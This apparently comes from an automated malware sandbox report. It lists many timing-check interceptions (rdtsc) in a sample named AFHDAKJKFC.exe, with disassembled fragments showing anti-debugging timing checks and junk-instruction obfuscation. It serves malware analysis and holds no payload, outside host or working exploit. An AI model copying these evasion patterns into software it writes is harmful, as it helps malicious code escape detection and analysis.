Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 8CC2FD second address: 8CC301 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 8CC301 second address: 8CC307 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 8CC307 second address: 8CC30D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 8CC742 second address: 8CC759 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jne 00007FAF7C6A41ACh 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push edx 0x00000010 pop edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 8CC759 second address: 8CC768 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FAF7CBD5D36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 8CCD74 second address: 8CCD97 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FAF7C6A41B9h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 8CD21A second address: 8CD23A instructions: 0x00000000 rdtsc 0x00000002 js 00007FAF7CBD5D36h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jnp 00007FAF7CBD5D36h 0x00000014 jmp 00007FAF7CBD5D3Ch 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 8CFF56 second address: 8CFF5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 8CFF5C second address: 8CFF60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 8D0195 second address: 8D01B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7C6A41AAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FAF7C6A41B1h 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 8D01B7 second address: 8D01BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 8D01BC second address: 8D01C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 8D01C2 second address: 8D026B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push eax 0x0000000b call 00007FAF7CBD5D38h 0x00000010 pop eax 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 add dword ptr [esp+04h], 0000001Ch 0x0000001d inc eax 0x0000001e push eax 0x0000001f ret 0x00000020 pop eax 0x00000021 ret 0x00000022 jmp 00007FAF7CBD5D3Dh 0x00000027 push 00000004h 0x00000029 jmp 00007FAF7CBD5D45h 0x0000002e call 00007FAF7CBD5D39h 0x00000033 pushad 0x00000034 jmp 00007FAF7CBD5D3Dh 0x00000039 jg 00007FAF7CBD5D41h 0x0000003f popad 0x00000040 push eax 0x00000041 jg 00007FAF7CBD5D3Eh 0x00000047 mov eax, dword ptr [esp+04h] 0x0000004b js 00007FAF7CBD5D3Eh 0x00000051 jc 00007FAF7CBD5D38h 0x00000057 push esi 0x00000058 pop esi 0x00000059 mov eax, dword ptr [eax] 0x0000005b pushad 0x0000005c push eax 0x0000005d push edx 0x0000005e jmp 00007FAF7CBD5D3Ah 0x00000063 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 8D026B second address: 8D027D instructions: 0x00000000 rdtsc 0x00000002 jc 00007FAF7C6A41A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jns 00007FAF7C6A41A6h 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 8D027D second address: 8D0281 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 8D0281 second address: 8D0295 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e jnp 00007FAF7C6A41A6h 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 8D1882 second address: 8D1886 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 8D2F96 second address: 8D2FA2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jnc 00007FAF7C6A41A6h 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 4A80EC1 second address: 4A80ED9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAF7CBD5D44h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 4A80ED9 second address: 4A80F3D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7C6A41ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FAF7C6A41ABh 0x00000015 xor cx, 231Eh 0x0000001a jmp 00007FAF7C6A41B9h 0x0000001f popfd 0x00000020 pushfd 0x00000021 jmp 00007FAF7C6A41B0h 0x00000026 sbb ecx, 55ABB118h 0x0000002c jmp 00007FAF7C6A41ABh 0x00000031 popfd 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 4A80F3D second address: 4A80F43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 4A80F43 second address: 4A80F47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 4A80F47 second address: 4A80F78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FAF7CBD5D3Eh 0x0000000e xchg eax, ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FAF7CBD5D47h 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 4A709F2 second address: 4A70A29 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FAF7C6A41AEh 0x00000008 jmp 00007FAF7C6A41B5h 0x0000000d popfd 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov ebx, eax 0x00000012 popad 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 movzx eax, dx 0x0000001a movsx edx, ax 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 4A70A29 second address: 4A70A4A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7CBD5D3Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FAF7CBD5D3Dh 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 4A50132 second address: 4A50159 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7C6A41B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c mov al, 84h 0x0000000e movsx edx, cx 0x00000011 popad 0x00000012 push dword ptr [ebp+04h] 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 4A50159 second address: 4A50176 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7CBD5D49h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 4A50176 second address: 4A50194 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7C6A41B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+0Ch] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 4A50194 second address: 4A50198 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 4A50198 second address: 4A5019E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 4A5019E second address: 4A501BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7CBD5D42h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+08h] 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f mov eax, 0ED83FF3h 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 4A7030B second address: 4A70311 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 4A7018F second address: 4A70193 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 4A70193 second address: 4A70199 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 4A70199 second address: 4A7019F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 4A7019F second address: 4A701A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 4A701A3 second address: 4A701B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 4A701B2 second address: 4A701B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 4A701B6 second address: 4A701BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 4A701BA second address: 4A701C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 4A701C0 second address: 4A701E5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7CBD5D41h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FAF7CBD5D3Dh 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 4A701E5 second address: 4A7021C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ecx 0x00000005 mov dh, E5h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov ebp, esp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 pushfd 0x00000012 jmp 00007FAF7C6A41ADh 0x00000017 sub cx, 3AF6h 0x0000001c jmp 00007FAF7C6A41B1h 0x00000021 popfd 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 4A7021C second address: 4A70222 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 4A70222 second address: 4A70226 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 4A70226 second address: 4A7022A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 4A60F46 second address: 4A60F6A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, si 0x00000006 mov ecx, 4079CA27h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 push edi 0x00000011 mov bx, si 0x00000014 pop ecx 0x00000015 mov di, A396h 0x00000019 popad 0x0000001a xchg eax, ebp 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e mov edx, ecx 0x00000020 movzx esi, bx 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 4A60F6A second address: 4A60F93 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov ebx, eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov ebp, esp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov ebx, 722D1A82h 0x00000014 call 00007FAF7CBD5D43h 0x00000019 pop eax 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 4A60F93 second address: 4A60FC7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7C6A41B6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FAF7C6A41B7h 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 4A70EB7 second address: 4A70EBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov cx, di 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 4A70EBF second address: 4A70EE7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7C6A41AAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FAF7C6A41B7h 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 4A70EE7 second address: 4A70EFF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAF7CBD5D44h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 4A70EFF second address: 4A70F03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 4AC002C second address: 4AC0044 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAF7CBD5D44h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 4AC0044 second address: 4AC0069 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FAF7C6A41B8h 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 4AC0069 second address: 4AC006D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 4AC006D second address: 4AC0073 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 4AC0073 second address: 4AC0079 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 4AC0079 second address: 4AC008B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov ax, dx 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 4AC008B second address: 4AC009E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAF7CBD5D3Fh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 4AC009E second address: 4AC00A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 4A90346 second address: 4A90374 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7CBD5D3Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FAF7CBD5D48h 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 4A90374 second address: 4A90383 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7C6A41ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 4A90383 second address: 4A9045C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, edx 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a movsx ebx, cx 0x0000000d pushfd 0x0000000e jmp 00007FAF7CBD5D46h 0x00000013 jmp 00007FAF7CBD5D45h 0x00000018 popfd 0x00000019 popad 0x0000001a xchg eax, ebp 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007FAF7CBD5D43h 0x00000022 or eax, 417F945Eh 0x00000028 jmp 00007FAF7CBD5D49h 0x0000002d popfd 0x0000002e popad 0x0000002f mov ebp, esp 0x00000031 pushad 0x00000032 mov ax, 64C3h 0x00000036 pushfd 0x00000037 jmp 00007FAF7CBD5D48h 0x0000003c adc si, 6788h 0x00000041 jmp 00007FAF7CBD5D3Bh 0x00000046 popfd 0x00000047 popad 0x00000048 mov eax, dword ptr [ebp+08h] 0x0000004b jmp 00007FAF7CBD5D46h 0x00000050 and dword ptr [eax], 00000000h 0x00000053 push eax 0x00000054 push edx 0x00000055 jmp 00007FAF7CBD5D47h 0x0000005a rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 4A9045C second address: 4A904B8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7C6A41B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and dword ptr [eax+04h], 00000000h 0x0000000d jmp 00007FAF7C6A41AEh 0x00000012 pop ebp 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 mov eax, edx 0x00000018 pushfd 0x00000019 jmp 00007FAF7C6A41B9h 0x0000001e jmp 00007FAF7C6A41ABh 0x00000023 popfd 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 4A7011E second address: 4A7013A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 movsx edi, cx 0x00000007 popad 0x00000008 popad 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FAF7CBD5D3Fh 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 4A7013A second address: 4A70140 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 4A70140 second address: 4A70144 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 4A80E26 second address: 4A80E2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 4A80E2C second address: 4A80E8E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov al, 2Dh 0x0000000c mov si, dx 0x0000000f popad 0x00000010 xchg eax, ebp 0x00000011 pushad 0x00000012 mov cx, bx 0x00000015 pushfd 0x00000016 jmp 00007FAF7CBD5D45h 0x0000001b adc cx, 9276h 0x00000020 jmp 00007FAF7CBD5D41h 0x00000025 popfd 0x00000026 popad 0x00000027 mov ebp, esp 0x00000029 jmp 00007FAF7CBD5D3Eh 0x0000002e pop ebp 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007FAF7CBD5D3Ah 0x00000038 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 4A80E8E second address: 4A80E94 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 4A80E94 second address: 4A80E9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 4A80E9A second address: 4A80E9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 4A9012C second address: 4A90135 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov di, 9514h 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 4A90135 second address: 4A9015D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7C6A41AAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FAF7C6A41B7h 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 4A9015D second address: 4A901D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, si 0x00000006 pushfd 0x00000007 jmp 00007FAF7CBD5D40h 0x0000000c adc ah, 00000028h 0x0000000f jmp 00007FAF7CBD5D3Bh 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push eax 0x00000019 pushad 0x0000001a jmp 00007FAF7CBD5D3Fh 0x0000001f jmp 00007FAF7CBD5D48h 0x00000024 popad 0x00000025 xchg eax, ebp 0x00000026 jmp 00007FAF7CBD5D40h 0x0000002b mov ebp, esp 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007FAF7CBD5D3Ah 0x00000036 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 4A901D1 second address: 4A901E0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7C6A41ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 4A901E0 second address: 4A901E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, 843Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 4A901E9 second address: 4A9020E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pop ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FAF7C6A41B9h 0x00000011 rdtsc
